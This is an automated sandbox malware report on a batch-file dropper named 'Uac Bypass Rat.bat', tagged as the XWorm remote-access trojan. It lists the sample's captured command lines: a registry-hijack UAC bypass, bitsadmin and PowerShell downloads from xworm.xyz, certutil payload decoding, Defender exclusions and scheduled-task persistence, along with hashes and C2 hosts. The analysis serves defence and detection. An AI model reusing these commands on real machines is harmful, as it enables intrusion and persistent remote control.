Malware Analysis Report

2024-10-16 05:07

Sample ID 240727-2plqeasekk
Target Uac Bypass Rat.bat
SHA256 a5414f82d063d24e7f0d7e417024ba796c6e52fcb07cd8e59c306fe0e05b7518
Tags
dropper execution xworm defense_evasion persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a5414f82d063d24e7f0d7e417024ba796c6e52fcb07cd8e59c306fe0e05b7518

Threat Level: Known bad

The file Uac Bypass Rat.bat was found to be: Known bad.

Malicious Activity Summary

dropper execution xworm defense_evasion persistence rat trojan

Detect Xworm Payload

Xworm

Download via BitsAdmin

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks computer location settings

Drops startup file

Deobfuscate/Decode Files or Information

Looks up external IP address via web service

Adds Run key to start application

Enumerates physical storage devices

Enumerates system info in registry

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Runs net.exe

Checks processor information in registry

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-27 22:45

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-27 22:45

Reported

2024-07-27 22:53

Platform

win7-20240708-en

Max time kernel

14s

Max time network

25s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\mscfile\shell\open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\mscfile C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\mscfile\shell C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\mscfile\shell\open C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" C:\Windows\system32\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2380 wrote to memory of 1572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2380 wrote to memory of 1572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2380 wrote to memory of 1572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1572 wrote to memory of 2344 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1572 wrote to memory of 2344 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1572 wrote to memory of 2344 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2380 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2380 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2380 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2380 wrote to memory of 2448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 2380 wrote to memory of 2448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 2380 wrote to memory of 2448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 2380 wrote to memory of 2920 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2920 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2920 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-test.bat C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-test.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat'"

Network

Country Destination Domain Proto
US 8.8.8.8:53 xworm.xyz udp
US 198.54.114.193:443 xworm.xyz tcp
US 198.54.114.193:443 xworm.xyz tcp

Files

memory/2920-4-0x000007FEF63DE000-0x000007FEF63DF000-memory.dmp

memory/2920-5-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

memory/2920-6-0x0000000001D90000-0x0000000001D98000-memory.dmp

memory/2920-7-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2920-8-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2920-9-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2920-10-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2920-11-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

memory/2920-12-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-27 22:45

Reported

2024-07-27 22:53

Platform

win10v2004-20240709-en

Max time kernel

148s

Max time network

156s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\Uni.exe N/A
N/A N/A C:\Users\Admin\Uni.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Uni = "C:\\Users\\Admin\\Uni.exe" C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\certutil.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\mscfile\shell\open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\mscfile C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\mscfile\shell C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\mscfile\shell\open C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" C:\Windows\system32\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Uni.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Uni.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2656 wrote to memory of 3828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2656 wrote to memory of 3828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3828 wrote to memory of 1984 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3828 wrote to memory of 1984 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2656 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2656 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2656 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 2656 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 2656 wrote to memory of 724 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2656 wrote to memory of 724 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2656 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2656 wrote to memory of 2292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2292 wrote to memory of 3288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2292 wrote to memory of 3288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2292 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Uni.exe
PID 2292 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Uni.exe
PID 2880 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 388 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 388 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\schtasks.exe
PID 2880 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-test.bat C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-test.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat"

C:\Windows\system32\certutil.exe

certutil -decodehex temp.hex "Uni.exe"

C:\Users\Admin\AppData\Local\Temp\Uni.exe

Uni.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Uni.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Uni.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Uni" /tr "C:\Users\Admin\Uni.exe"

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 xworm.xyz udp
US 198.54.114.193:443 xworm.xyz tcp
US 8.8.8.8:53 193.114.54.198.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 198.54.114.193:443 xworm.xyz tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 las-protected.gl.at.ply.gg udp
US 147.185.221.18:59571 las-protected.gl.at.ply.gg tcp
US 8.8.8.8:53 18.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 147.185.221.18:59571 las-protected.gl.at.ply.gg tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 30.73.42.20.in-addr.arpa udp

Files

memory/724-0-0x00007FF895583000-0x00007FF895585000-memory.dmp

memory/724-2-0x0000027147EF0000-0x0000027147F12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fupjkccl.aq4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/724-11-0x00007FF895580000-0x00007FF896041000-memory.dmp

memory/724-12-0x00007FF895580000-0x00007FF896041000-memory.dmp

memory/724-16-0x00007FF895580000-0x00007FF896041000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat

MD5 011e90b162cf67f34f91d6d563859817
SHA1 30ce18995be9545ae88189bc3ff5defbd2392d11
SHA256 6cced62e6af36a52c48fdf0efb1571a44d6469f4ca66ca510020e5da407ed613
SHA512 51d47a852b27540154c8b3ccb295dae4874475bf631be931bf8a4cf271805e927162c7f01e8df7f0aea8b9a860dac3500e59208cb60440bfa8e827325be7a36d

C:\Users\Admin\AppData\Local\Temp\temp.hex

MD5 fad3aaf3015914e834a9d0313fcd371b
SHA1 a4715a153a79263436819905b87b54acae4b2227
SHA256 917674ca36b5345dccd41f4ce772c6ffe8c3054520ebd2923fba768cbee77690
SHA512 64c9bd116ad70abf9e8bf444f248915383d4b4680de1f6dadad649e0279803c9575952b0e1995a34e47c5a73eb42e23e964437a4a7828d3214f3f694383db83a

C:\Users\Admin\AppData\Local\Temp\Uni.exe

MD5 09e870076cfaa16f20be5050834ba8ff
SHA1 0b8b26cdaf08a07b8e86b1643ca23e249c8f3840
SHA256 f3fcb094f57ddd9e4c29eccc62e3ad3ce50d40230fbe0f00324ccf18acd68bc4
SHA512 d655030bf9bb84ecdd7109aab55c33976e2a2cbd63ccece48d3e881b1dd378e4e17f157a3dd9a07e8786650cbf46b8d742a115cb9906c9b69d7143c2b4de0643

memory/2880-24-0x0000000000FB0000-0x0000000000FC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7c1431cd87a8177c0b790888c1b6efa8
SHA1 fb67e6753ce01fa6f2fd782c48a0ed8da395b056
SHA256 9dec36ec39ac64e0cd97dc33f58b6b00875f113d7f07ab06636f628bd8f10616
SHA512 20ee122f42320291b3877d98ca7441fea9521d51d3bd63147d35f9208d8014cadb0c99114936ace30b8132946c08946d42e442e4797ceaf3c20e9fae35a92ca7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3f225baf35f32e8fc3bd651eb5eb13dc
SHA1 86dcbfc1f192a1f3c53eee82afb76d6fc0c70ff6
SHA256 e921b097db1d86abf03e6fe09eeb4934e7d11aa830e00947892530ff4f92441e
SHA512 e85946d77eb0eee6040416f6756f75a5a7c602a062fec547f376df0a24b2957883314966e3ecc7cf5f47fda80b375e0816e0294e1e3c44036d90274b6cf3d4d4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e69c5554cfe965e000e33ee9f1cd88d5
SHA1 ef74e8e9a0113870c87ece51d4e86040b1eeecdc
SHA256 712c2be9f3cff2c74ba7c7cd92208f724c8862277dd8b4f6f2605cc50fb4fdd0
SHA512 6a8e64e11df3fa1aa32f95387f3b43d2ed6f4c996db8cee9110586e4bb9eba604550235b6fa6a41beb6fcc31339cb969a6e79d3fcf1f7d42dcd4655cfee38a16

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c1b0a9f26c3e1786191e94e419f1fbf9
SHA1 7f3492f4ec2d93e164f43fe2606b53edcffd8926
SHA256 796649641966f606d7217bb94c5c0a6194eef518815dacc86feacdd78d3c1113
SHA512 fa0290d77372c26a2f14cb9b0002c222bc757ce7ad02516b884c59a1108f42eb4c76884f9edb6c7149f7c3fac917eda99b72a3b1d72b7e118a1d5a73cadd15a8

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Uni.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

memory/2880-93-0x0000000001780000-0x000000000178C000-memory.dmp

memory/2880-94-0x000000001E570000-0x000000001EA98000-memory.dmp